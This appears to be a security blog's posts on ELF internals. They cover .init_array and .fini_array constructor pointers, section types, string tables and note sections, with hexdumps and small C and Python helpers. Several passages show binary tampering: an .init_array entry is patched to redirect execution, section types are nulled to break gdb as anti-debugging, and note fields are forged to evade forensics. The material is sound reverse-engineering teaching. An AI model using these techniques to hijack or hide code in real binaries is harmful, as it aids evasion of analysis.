I'd like to get straight into deconstructing how the <span style="font-family: "courier new" , "courier" , monospace;">.init_array</span> and <span style="font-family: "courier new" , "courier" , monospace;">.fini_array </span>sections work. Let's see what they look like in the section header table and annotate all their fields in an honest <span style="font-family: "courier new" , "courier" , monospace;">hexdump</span>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTtuj_cHGizw9qbzpkH8JVTmmAYO9BHTODgmEsu4uKKmZLjsqOev6BZ11BT6z_1zD9klWvKALAgECfdhjROGV8hbT9rVlBOE2XLvwjD1NZIaq1U_EIiO1qLmw-_fkzx_wjFZuL65N0a9I/s1600/init_fini+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="637" data-original-width="1101" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTtuj_cHGizw9qbzpkH8JVTmmAYO9BHTODgmEsu4uKKmZLjsqOev6BZ11BT6z_1zD9klWvKALAgECfdhjROGV8hbT9rVlBOE2XLvwjD1NZIaq1U_EIiO1qLmw-_fkzx_wjFZuL65N0a9I/s1600/init_fini+%25281%2529.png" /></a></div>
<br />
<br />
<br />
What we can see here is that the <span style="font-family: "courier new" , "courier" , monospace;">.init_array</span> section points into the ELF file at <span style="font-family: "courier new" , "courier" , monospace;">0x0e00</span>, which holds two addresses:<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">0x0e00</span> <span style="font-family: "courier new" , "courier" , monospace;">(.init_array)</span></li>
<ul>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x400540 (frame_dummy)</span> - <i>not going to dig into this too much, but from what I glean so far, this sets things up for exception handling and for reconstructing stack frames to aid debugging and stack forensics. More on this <a href="https://stackoverflow.com/questions/34966097/what-functions-does-gcc-add-to-the-linux-elf">here</a> and <a href="http://alien.cern.ch/cache/autopackage-1.0/site/docs/devguide/ch07s05.html">here</a>.</i></li>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x400440 (foo_constructor)</span> - our constructor!</li>
</ul>
</ul>
<div>
We also have the <span style="font-family: "courier new" , "courier" , monospace;">.fini_array</span> section at <span style="font-family: "courier new" , "courier" , monospace;">0x0e10</span>, which holds these entries:</div>
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">0x0e10</span> <span style="font-family: "courier new" , "courier" , monospace;">(.fini_array)</span></li>
<ul>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x400520 (__do_global_dtors_aux) </span>- <i>according to <a href="https://stackoverflow.com/questions/34966097/what-functions-does-gcc-add-to-the-linux-elf">this</a>, handles destructors when <span style="font-family: "courier new" , "courier" , monospace;">.fini_array</span> is not defined.</i></li>
<li> <span style="font-family: "courier new" , "courier" , monospace;">0x400430 (foo_destructor)</span> - our destructor!</li>
</ul>
</ul>
</div>
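To see the same kind of entries from inside a running program, the program can walk its own .init_array. This sketch assumes the linker defines __init_array_start and __init_array_end around the output .init_array (GNU ld's default linker script PROVIDEs them; other linkers may differ); marker_constructor and the helper names are hypothetical.

```c
#include <stddef.h>

typedef void (*init_fn)(void);

/* Assumption: bracketing symbols provided (hidden) by the linker script. */
extern init_fn __init_array_start[];
extern init_fn __init_array_end[];

/* A marker constructor, so .init_array has at least one known entry. */
__attribute__((constructor))
static void marker_constructor(void) { }

/* Number of function pointers in this executable's .init_array. */
size_t init_array_count(void)
{
    return (size_t)(__init_array_end - __init_array_start);
}

/* Return 1 if `fn` appears in .init_array, 0 otherwise. */
int init_array_contains(init_fn fn)
{
    for (init_fn *p = __init_array_start; p < __init_array_end; p++)
        if (*p == fn)
            return 1;
    return 0;
}

/* Exposes the marker's address so callers can look it up. */
init_fn marker_address(void)
{
    return marker_constructor;
}
```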
So we know where to find the pointers to our destructor and constructor functions, and we know when they will be called; let's see if we can force the binary to call another function instead.<br />
<br />
So if I were to make an entry in <span style="font-family: "courier new" , "courier" , monospace;">.init_array</span> point to the function <span style="font-family: "courier new" , "courier" , monospace;">never_call</span> (<i>which, as in the previous example, is never called under normal execution</i>), here's what the <span style="font-family: "courier new" , "courier" , monospace;">hexdump</span> would look like:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp5DArrTDmwJVvAL12bz63KAbg-T-LFzDnm5YmKmL_oY9l4cz3aL5DXKfqpSf9TTamZrELN_zrnJtdQV95T-LmW-k6lEo5Cr_mNzj7HUGYLEFbG6fzeKZq8g4vnj8Qh_2UZsKXbVT0Yl0/s1600/never_call_init.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="719" data-original-width="1143" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp5DArrTDmwJVvAL12bz63KAbg-T-LFzDnm5YmKmL_oY9l4cz3aL5DXKfqpSf9TTamZrELN_zrnJtdQV95T-LmW-k6lEo5Cr_mNzj7HUGYLEFbG6fzeKZq8g4vnj8Qh_2UZsKXbVT0Yl0/s1600/never_call_init.png" /></a></div>
<br />
<br />
Win! We can control the flow of execution by redirecting the entries in the <span style="font-family: "courier new" , "courier" , monospace;">.init_array</span> section! This of course works the same way for <span style="font-family: "courier new" , "courier" , monospace;">.fini_array</span>; I'm going to leave that for you folks to figure out if you'd like to.<br />
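The patch itself is just an 8-byte little-endian overwrite at a file offset. Here is a minimal sketch operating on an in-memory copy of the file, assuming a little-endian 64-bit ELF; the offset 0x0e08 (the second .init_array slot from the listing above) and the replacement address in the test are hypothetical values, since the real never_call address comes from your own binary.

```c
#include <stddef.h>
#include <stdint.h>

/* Read the little-endian 64-bit value at `off` (e.g. one .init_array slot). */
uint64_t read_u64_le(const unsigned char *buf, size_t off)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | buf[off + (size_t)i];
    return v;
}

/* Overwrite the 8-byte little-endian pointer at `off` with `value`.
 * Returns 0 on success, -1 if the slot would run past the buffer. */
int patch_u64_le(unsigned char *buf, size_t len, size_t off, uint64_t value)
{
    if (off > len || len - off < 8)
        return -1;
    for (int i = 0; i < 8; i++)
        buf[off + (size_t)i] = (unsigned char)(value >> (8 * i));
    return 0;
}
```

This assumes a non-PIE binary like the one above (addresses around 0x400000). In a PIE, the dynamic loader fills these slots from R_X86_64_RELATIVE relocations at load time, so patching the file bytes alone may not be enough.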
<br />
Thanks for reading this one, more posts on deep Elf sorcery and other wonderful linuxy things coming soon!<br />
<h2>
References and Recommended Reading</h2>
<ol style="text-align: left;">
<li>How C Programs get run <a href="https://lwn.net/Articles/631631/">https://lwn.net/Articles/631631/</a> </li>
<li>System V ABI, AMD64 Architecture Processor Supplement (Intel) <a href="https://software.intel.com/sites/default/files/article/402129/mpx-linux64-abi.pdf">https://software.intel.com/sites/default/files/article/402129/mpx-linux64-abi.pdf</a></li>
<li>System V ABI <a href="https://wiki.osdev.org/System_V_ABI">https://wiki.osdev.org/System_V_ABI</a></li>
<li>Examining Memory with GDB <a href="https://sourceware.org/gdb/onlinedocs/gdb/Memory.html">https://sourceware.org/gdb/onlinedocs/gdb/Memory.html</a></li>
<li>What functions does gcc add to the linux ELF? <a href="https://stackoverflow.com/questions/34966097/what-functions-does-gcc-add-to-the-linux-elf">https://stackoverflow.com/questions/34966097/what-functions-does-gcc-add-to-the-linux-elf</a></li>
<li>Linux x86 Program Start Up <a href="http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html">http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html</a></li>
</ol>
<h2>
Footnotes</h2>
<h3 style="text-align: left;">
<i>1 - </i>why _dl_fini should be referred to as the destructor "function call handler", in my opinion</h3>
<div>
<br /></div>
<div>
This is because, though some folks refer to this as THE [de/con]-structor function, in reality it is only the standardized function that finds the pointers TO the user-defined [de/con]-structor functions. Here's why I say so, an extract from <a href="https://github.com/lattera/glibc/blob/master/elf/dl-fini.c#L137">https://github.com/lattera/glibc/blob/master/elf/dl-fini.c#L137</a>: </div>
<div>
<script src="https://gist.github.com/k3170makan/56d3c3442ec3109d1341883a56d5290e.js"></script>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<i>What can I say folks that glibc comment game is solid though. Code speaks for its Elf around here ;)</i></div>
<div>
So I take it this makes it obvious that the pointer to the <span style="font-family: "courier new" , "courier" , monospace;">_dl_fini</span> function can actually be referred to as more of a destructor "call handler", no? To close my point, let's look at <span style="font-family: "courier new" , "courier" , monospace;">dl-init.c</span> for the definition of <span style="font-family: "courier new" , "courier" , monospace;">_dl_init</span> as well:<br />
<br />
<br /></div>
<div>
<script src="https://gist.github.com/k3170makan/6ed1ae0e4230f83d1f8408852e796d8d.js"></script>
</div>
<div>
Pretty much the same thing: it uses a link map object (<span style="font-family: "courier new" , "courier" , monospace;"> ElfW(Dyn) *preinit_array = main_map->l_info[DT_PREINIT_ARRAY]; </span>) loaded with the offsets and all the ELF format goodies, uses this to calculate the location of the init function array, and then just runs through it, calling each function with <span style="font-family: "courier new" , "courier" , monospace;">argc</span>, <span style="font-family: "courier new" , "courier" , monospace;">argv</span> and <span style="font-family: "courier new" , "courier" , monospace;">envp.</span><br />
<br />
Anyway, while making that heavily egotistical point we actually traversed some pretty important code in the Elf world: this is the very definition of the <span style="font-family: "courier new" , "courier" , monospace;">_dl_fini </span>function that handles your binary. If you wanna unlock the s e c r e t s, you should spend some time digging through that <span style="font-family: "courier new" , "courier" , monospace;">/elf/</span> directory.<br />
<br /></div>
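The loop described above boils down to iterating an array of function pointers and calling each one with argc, argv and envp. This is a minimal sketch with hypothetical names (init_array_fn, run_init_array, example_init); glibc's real _dl_init also handles the link map lookup, the preinit array and DT_INIT, all of which are omitted here.

```c
#include <stddef.h>

/* Entries in .preinit_array/.init_array may take (argc, argv, envp). */
typedef void (*init_array_fn)(int, char **, char **);

/* Call each entry in order, the way the dynamic linker walks an init array. */
void run_init_array(init_array_fn *array, size_t count,
                    int argc, char **argv, char **envp)
{
    for (size_t i = 0; i < count; i++)
        array[i](argc, argv, envp);
}

/* Example entry that just counts how often it was called. */
int example_calls = 0;

void example_init(int argc, char **argv, char **envp)
{
    (void)argc;
    (void)argv;
    (void)envp;
    example_calls++;
}
```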
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-68343931561412104242018-10-04T17:54:00.000-07:002018-10-04T19:14:09.796-07:00Introduction to The ELF Format (Part IV): Exploring Section Types and Special Sections<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hi folks, this post is part of a series about the ELF format. So far in this series we have:<br />
<br />
<ol style="text-align: left;">
<li>ELF Header <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html</a> </li>
<li>ELF Header and Program Headers <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html</a></li>
<li>ELF Header and Section Header Table <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html</a></li>
</ol>
<div>
In this post I'm going to go over how some of the sections in the format work in a bit more detail. Previous posts didn't really expand on all the weirdness that each individual section type and format can harbor, especially in how it can break interpretation of the file under normal debugging and reverse engineering efforts. We're going to run through a couple of sections here, talk about different section types and see what ELFs can make some of the binutils do if we mess around with the bytes. Hope you folks enjoy!</div>
<div>
<h3 style="text-align: left;">
Section Types</h3>
</div>
<div>
In other posts I've already expanded on the section header table, and in that header we have a field called sh_type, which indicates the section type. Each section type is like a model or layout for a given kind of section and imposes certain attributes on how the bits and bytes are grouped together to mean things in those sections. For instance, they might be simple lists or complex nested hash lookup tables.<br />
<br />
To make this clearer, let's imagine how this aids problem solving in the ELF format. Let's say a compiler, malware or exploit developer needs a section to host a simple list of strings; in this case a section type of <span style="font-family: "courier new" , "courier" , monospace;">SHT_STRTAB</span> would be appropriate. And as we see, <span style="font-family: "courier new" , "courier" , monospace;">.shstrtab</span> and <span style="font-family: "courier new" , "courier" , monospace;">.strtab</span> are exactly that type:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyF-LRC-AtM0CEhW9Kd1TCUBfZJ4DYmQt9ZKAhg4Z0ysMfcHHxW7BxsjfQAmBrL1KFaAwL_kzcoVuJbzo02h0UB519BnQ2hJ5Lh3htKwXa_Ktt3dBSwSJZCAhG-g3ZC7VFdudo_-x7UfQ/s1600/Screenshot+from+2018-09-28+21-56-39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="195" data-original-width="1140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyF-LRC-AtM0CEhW9Kd1TCUBfZJ4DYmQt9ZKAhg4Z0ysMfcHHxW7BxsjfQAmBrL1KFaAwL_kzcoVuJbzo02h0UB519BnQ2hJ5Lh3htKwXa_Ktt3dBSwSJZCAhG-g3ZC7VFdudo_-x7UfQ/s1600/Screenshot+from+2018-09-28+21-56-39.png" /></a></div>
<br />
<br />
Here's a list of what some of the others are meant to be used for:<br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">SHT_NULL</span> - marks the section header as inactive: the documentation says such an entry has no associated section and the values of its other fields are undefined, so it will most probably be skipped over by most semantically driven ELF utilities. The first entry of the section header table (index 0) is reserved and is always of this type.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">SHT_PROGBITS</span> - This is a marking for a section that could contain anything; its format and meaning are dictated by the program itself. <span style="font-family: "courier new" , "courier" , monospace;">PROGBITS</span> is pretty much for program specific behavior, which could be anything, literally anything, even Turing complete anything! These are typically used for marking the sections that contain the actual code for execution, the data section, and initialization / finalization procedures <i>(or perhaps even wilder concepts specific to the ABI or compiler producing the executable code sections and accompaniments; again, this section type doesn't impose much format control really</i>) </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">SHT_SYMTAB - </span>This marks a section that should have the format of a symbol table. I will of course flesh out how this works later on in the post because it needs its own space, so in a literal way I'm going to use this keyword to mark a section further down in the post :) </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">SHT_STRTAB </span>- A section that holds a sequence of null-terminated strings.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">SHT_HASH -</span> This section is for holding a hash table, usually to speed up looking up symbols. In fact, the documentation says that if an executable participates in dynamic linking it MUST have one of these sections. I will put that bold brave beautiful claim to the test later on in the post <i>(if not in its own post, depending on how exciting this potential lie becomes</i>).</li>
</ul>
<div>
There are tons more section types; I think it's best to refer to the documentation for the full list instead of re-creating it here. Let's take a closer look at how some of these work, though.</div>
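For hands-on experiments, the numeric sh_type values can be mapped back to names using the constants in glibc's &lt;elf.h&gt;. This small sketch covers only the types discussed above plus SHT_NOTE; sh_type_name is a hypothetical helper, and &lt;elf.h&gt; is assumed to be available (it ships with glibc).

```c
#include <elf.h>

/* Map an sh_type value to its name for the types discussed in this post. */
const char *sh_type_name(Elf64_Word sh_type)
{
    switch (sh_type) {
    case SHT_NULL:     return "SHT_NULL";     /* 0 */
    case SHT_PROGBITS: return "SHT_PROGBITS"; /* 1 */
    case SHT_SYMTAB:   return "SHT_SYMTAB";   /* 2 */
    case SHT_STRTAB:   return "SHT_STRTAB";   /* 3 */
    case SHT_HASH:     return "SHT_HASH";     /* 5 */
    case SHT_NOTE:     return "SHT_NOTE";     /* 7 */
    default:           return "other";
    }
}
```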
<div>
<br />
<h2 style="text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">SHT_STRTAB</span> section types (.shstrtab and friends)</h2>
<br />
Here's what a typical <span style="font-family: "courier new" , "courier" , monospace;">SHT_STRTAB</span> section looks like in a hexdump:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj93tCd92PoVBW-88Oo-QkrdARPHv7TGEK_QMpwaQeGpNg75uW_NlEyR6l3ko9AzvYY7gACs8idy5Dvo_tHGim53VyaVs-dGoaQbk8J0emK_CNvM60R4y29S9KZQ7Ny01G8wwTx2uD8WPA/s1600/string+table+section+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="197" data-original-width="1075" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj93tCd92PoVBW-88Oo-QkrdARPHv7TGEK_QMpwaQeGpNg75uW_NlEyR6l3ko9AzvYY7gACs8idy5Dvo_tHGim53VyaVs-dGoaQbk8J0emK_CNvM60R4y29S9KZQ7Ny01G8wwTx2uD8WPA/s1600/string+table+section+%25281%2529.png" /></a></div>
<br />
<br />
As you can see the strings are nice and neatly delimited by null bytes, super easy to not mess this up when reading in strings in C :))).<br />
<br />
In previous posts I mentioned that the <span style="font-family: "courier new" , "courier" , monospace;">.shstrtab</span> holds section names, which means it provides a good starting point for mangling the section attributes in a way that skews their interpretation by debug tools or other ELF interpreters - a key skill in understanding how they work!*<br />
<br />
So, using that same approach, for the first experiment I moved the start of the <span style="font-family: "courier new" , "courier" , monospace;">shstrtab</span> 8 bytes further down to see what happens to <span style="font-family: "courier new" , "courier" , monospace;">readelf</span>'s output about the sections. I got the following results:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-ou1gp5h5T1nslyOxS2UHMFwr9ncCi_KY6TbCNJ6LBn7Mu_pPnR_r5S1Pi3CCxiaHv1KA5POyto7XWqzR3pueY4IeBHf3osKpTSknWDk-8TgS7TCXdCvwVv4FoqplUXAYSBYIe11B5oE/s1600/shstrtabndx+experiment+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="476" data-original-width="954" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-ou1gp5h5T1nslyOxS2UHMFwr9ncCi_KY6TbCNJ6LBn7Mu_pPnR_r5S1Pi3CCxiaHv1KA5POyto7XWqzR3pueY4IeBHf3osKpTSknWDk-8TgS7TCXdCvwVv4FoqplUXAYSBYIe11B5oE/s1600/shstrtabndx+experiment+%25281%2529.png" /></a></div>
<br />
Just to make the diagram clearer: the top frame shows the raw <span style="font-family: "courier new" , "courier" , monospace;">hexdump</span> of the start of the <span style="font-family: "courier new" , "courier" , monospace;">shstrtab</span>. It originally started at <span style="font-family: "courier new" , "courier" , monospace;">0x18F4</span>, and we shifted it down to start at <span style="font-family: "courier new" , "courier" , monospace;">0x18FC</span>.<br />
<br />
What you should see in this <i>perhaps bloated diagram sketch</i> is that by moving the start of the <span style="font-family: "courier new" , "courier" , monospace;">shstrtab</span> section, every section name now starts 8 bytes further down. Because they are strings, <span style="font-family: "courier new" , "courier" , monospace;">readelf</span> reads bytes in from that new starting point until it hits a null byte. For instance, the first section name, instead of <span style="font-family: "courier new" , "courier" , monospace;">.interp</span> (which originally started at <span style="font-family: "courier new" , "courier" , monospace;">0x190F</span>), now points to <span style="font-family: "courier new" , "courier" , monospace;">0x1917</span>. So the <span style="font-family: "courier new" , "courier" , monospace;">.interp </span>section, usually the first valid section, is now called <span style="font-family: "courier new" , "courier" , monospace;">.note.ABI-tag</span>. The following section name (<i>which also starts 8 bytes down</i>) is then <span style="font-family: "courier new" , "courier" , monospace;">I-tag</span> (<i>since this starts at <span style="font-family: "courier new" , "courier" , monospace;">0x191F</span></i>), read until the null byte at <span style="font-family: "courier new" , "courier" , monospace;">0x1924</span>. The rest of the sections follow the same pattern; a good exercise would be to confirm this on your own.<br />
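The name lookup in this experiment can be sketched in C with a toy string table laid out in the usual order (.symtab, .strtab, .shstrtab, .interp, .note.ABI-tag). The toy table and the strtab_lookup helper are hypothetical; a real .shstrtab contains more names, and the base parameter simply models how far the table's start was moved. This is roughly how a tool resolves sh_name, not readelf's actual code.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Resolve a section name: start at (string table start + base + sh_name)
 * and read up to the next NUL. base = 0 is the untouched table, base = 8
 * models the shifted table from the experiment. Returns NULL if the name
 * would start at or run past the end of the table. */
const char *strtab_lookup(const char *tab, size_t tab_size,
                          size_t base, uint32_t sh_name)
{
    size_t off = base + sh_name;
    if (off >= tab_size)
        return NULL;
    if (memchr(tab + off, '\0', tab_size - off) == NULL)
        return NULL;
    return tab + off;
}
```

With the toy table "\0.symtab\0.strtab\0.shstrtab\0.interp\0.note.ABI-tag\0", .interp sits at sh_name 27 (0x18F4 + 27 = 0x190F). With base 8, that same sh_name resolves to ".note.ABI-tag", and the .note.ABI-tag entry (sh_name 35) resolves to "I-tag", matching the renamed sections above.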
<br />
Okay, so what happens when we mangle the section types? Let's say we NULL them out or swap the section types on some of them, and see if the program still runs; and if it doesn't, why, and how close it gets to running.<br />
<br />
Here are the results from <span style="font-family: "courier new" , "courier" , monospace;">NULL</span>ing out the section types (<i>recall that giving a section a null type in the section header table means it will be "skipped"</i>):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrymS4TI2ZXddpdCXBPP81K0x7LjYPsbCeKMxy4EJsLifBBKAjtPCEEjupB4KeZDeIIjPzRN9wIUArIOczN1iwu6DpktUwDKjE28ZzWGo38Gxxdbu5IBITUPhfowaF71NZieRRqCxhwjg/s1600/null+section+types+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="296" data-original-width="1249" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrymS4TI2ZXddpdCXBPP81K0x7LjYPsbCeKMxy4EJsLifBBKAjtPCEEjupB4KeZDeIIjPzRN9wIUArIOczN1iwu6DpktUwDKjE28ZzWGo38Gxxdbu5IBITUPhfowaF71NZieRRqCxhwjg/s1600/null+section+types+%25281%2529.png" /></a></div>
<br />
<br />
The large white column here marks the column in this ELF that contains the <span style="font-family: "courier new" , "courier" , monospace;">sh_type</span> bytes; I'm really just being lazy with labeling here and leaving identification of the individual section types up to the reader if need be. But once you get into the swing of identifying the section table layout by hand, you'll quickly realize that if this column is null, a whole bunch of section types have been nulled out. The smaller boxes next to this column show the virtual addresses of some of the sections; I highlight them so you can quickly see that we have indeed written over the records for the sections shown on the right. We can also see in the <span style="font-family: "courier new" , "courier" , monospace;">hexdump</span> that the section header table starts at <span style="font-family: "courier new" , "courier" , monospace;">0x1a00</span> (<i>which is the value we usually see for the example binary I'm using, so we can guess that I probably didn't change it; the faults here are caused directly by the sh_type mangling alone</i>). To confirm this another way, we can see in the <span style="font-family: "courier new" , "courier" , monospace;">readelf</span> output on the right that all the section types are indicated as NULL.<br />
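The mangling itself is easy to reproduce programmatically. This is a minimal sketch, assuming a 64-bit ELF loaded into memory on a host with the same byte order (e.g. x86_64); null_section_types is a hypothetical helper. Run it on a copy of the binary, write the buffer back out, then compare readelf -S and gdb on the result.

```c
#include <elf.h>
#include <stddef.h>
#include <string.h>

/* Set sh_type to SHT_NULL in every section header of an ELF64 image held
 * in memory. Returns the number of headers changed, or -1 if the image
 * does not look like a well-formed ELF64 file. */
long null_section_types(unsigned char *image, size_t size)
{
    Elf64_Ehdr eh;
    if (size < sizeof eh)
        return -1;
    memcpy(&eh, image, sizeof eh);
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 ||
        eh.e_ident[EI_CLASS] != ELFCLASS64 ||
        eh.e_shentsize != sizeof(Elf64_Shdr))
        return -1;
    /* The whole section header table must fit inside the image. */
    if (eh.e_shoff > size ||
        (size - eh.e_shoff) / sizeof(Elf64_Shdr) < eh.e_shnum)
        return -1;

    for (Elf64_Half i = 0; i < eh.e_shnum; i++) {
        unsigned char *rec = image + eh.e_shoff + (size_t)i * sizeof(Elf64_Shdr);
        Elf64_Shdr sh;
        memcpy(&sh, rec, sizeof sh); /* memcpy avoids unaligned access */
        sh.sh_type = SHT_NULL;
        memcpy(rec, &sh, sizeof sh);
    }
    return (long)eh.e_shnum;
}
```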
<br />
We can also see that this does strange things to <span style="font-family: "courier new" , "courier" , monospace;">gdb</span> when it's trying to load information from those sections, and can even break its ability to interpret the file as an executable:<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXfwpjukD6bPKE6les9GEG4CLkAl6eFMVw4wsAjvaXMFUdDqL9YDaSYQnUBoRKgjzB4ZDHmVPVzRL52DAlPFy1YV2D631L9Cw13tJ-eXn2WB41hIC70PObG87Ej84C_2-CzQdsY-ZFwn0/s1600/nullsectionsingdb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="497" data-original-width="751" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXfwpjukD6bPKE6les9GEG4CLkAl6eFMVw4wsAjvaXMFUdDqL9YDaSYQnUBoRKgjzB4ZDHmVPVzRL52DAlPFy1YV2D631L9Cw13tJ-eXn2WB41hIC70PObG87Ej84C_2-CzQdsY-ZFwn0/s1600/nullsectionsingdb.png" /></a></div>
<br />
Some rudimentary anti-debugging right there. Of course, the immediate complement of this as a reverse engineering effort would be to reconstitute the section headers of a stripped binary (<i>this would work essentially by understanding common layouts of the file and identifying the most likely offsets for the <span style="font-family: "courier new" , "courier" , monospace;">sh_*</span> fields</i>). It might be worth exploring what happens when you mangle other section attributes and pass the result to other utilities like <span style="font-family: "courier new" , "courier" , monospace;">strace</span> and <span style="font-family: "courier new" , "courier" , monospace;">ltrace. </span><span style="font-family: "arial" , "helvetica" , sans-serif;">Moving on!</span><br />
<h2 style="text-align: left;">
SHT_NOTE sections (.note.ABI-tag and friends)</h2>
<br />
The <span style="font-family: "courier new" , "courier" , monospace;">SHT_NOTE</span> type sections hold small records of vendor-specific information, mostly versioning and typing. The GNU toolchain marks ELFs liberally with these sections on GNU/Linux systems: they indicate that the file was built by tools from these systems and carry versioning information about it. So a note might record, let's say, your kernel version or potentially the version of a GNU tool (<i>if you're doing forensics this might be helpful; if you're avoiding forensics, it might be worth stripping or forging these fields hehe</i>).<br />
<br />
The <span style="font-family: "courier new" , "courier" , monospace;">.note.ABI-tag</span> section holds some versioning information about the ABI being used and the operating system this file is for. Each note entry starts with three 32-bit words, followed by the name and the descriptor, each padded out to a 4-byte boundary. For the ABI tag the layout works out as follows:<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">0x00 (4 bytes) namesz </span>- size of the name field in bytes</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x04 (4 bytes) descsz</span> - size of the desc field in bytes</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x08 (4 bytes) type</span> - the note type, interpreted relative to the name (the "vendor")</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x0C (namesz bytes, here 4) name</span> - a null-terminated string naming the owner of the note</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x10 (descsz bytes, here 16) desc</span> - the descriptor, holding some numbers that indicate the OS and its version</li>
</ul>
The documentation describes that a note can have no descriptor at all; in that case <span style="font-family: "courier new" , "courier" , monospace;">descsz</span> is set to 0 and the desc field (at <span style="font-family: "courier new" , "courier" , monospace;">0x10</span> in the layout above) is simply omitted.<br />
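Here's a small Python sketch of walking one note entry using that layout. It assumes little-endian words and the 4-byte padding GNU toolchains use for notes like this one; <span style="font-family: "courier new" , "courier" , monospace;">parse_note</span> is a hypothetical helper name.<br />

```python
import struct


def align4(n: int) -> int:
    """Round n up to the next multiple of 4 (note fields are 4-byte padded)."""
    return (n + 3) & ~3


def parse_note(buf: bytes, off: int = 0):
    """Parse one ELF note entry starting at buf[off].

    Returns (name, note_type, desc, next_offset). Assumes little-endian
    32-bit namesz/descsz/type words and 4-byte alignment (an assumption).
    """
    namesz, descsz, note_type = struct.unpack_from("<III", buf, off)
    name_off = off + 12                      # name follows the three words
    name = bytes(buf[name_off:name_off + namesz])
    desc_off = name_off + align4(namesz)     # desc starts after padded name
    desc = bytes(buf[desc_off:desc_off + descsz])  # b"" when descsz == 0
    next_off = desc_off + align4(descsz)     # the next note, if any
    return name, note_type, desc, next_off
```

A note with no descriptor falls out naturally: with <span style="font-family: "courier new" , "courier" , monospace;">descsz</span> set to 0, desc comes back empty and the next entry starts right after the padded name.<br />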
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Here's what a note section looks like in a hexdump:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTK9BlvbtzN9MSK15Sqnoe0YW4qNA1PzwSVV0099yR2EOeepxkQ0fsdLuoP38G-qhFG4yWTkFi_TQaS8ZfxXlkb-KK1dBYMApREXRCgB0c0lk3IyftP16QqU3OgbMpKHVcYrfZ3TFVl2E/s1600/note+section.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="433" data-original-width="1139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTK9BlvbtzN9MSK15Sqnoe0YW4qNA1PzwSVV0099yR2EOeepxkQ0fsdLuoP38G-qhFG4yWTkFi_TQaS8ZfxXlkb-KK1dBYMApREXRCgB0c0lk3IyftP16QqU3OgbMpKHVcYrfZ3TFVl2E/s1600/note+section.png" /></a></div>
<br />
<br />
Here we can see the following settings for the field values:<br />
<br />
<ul style="text-align: left;">
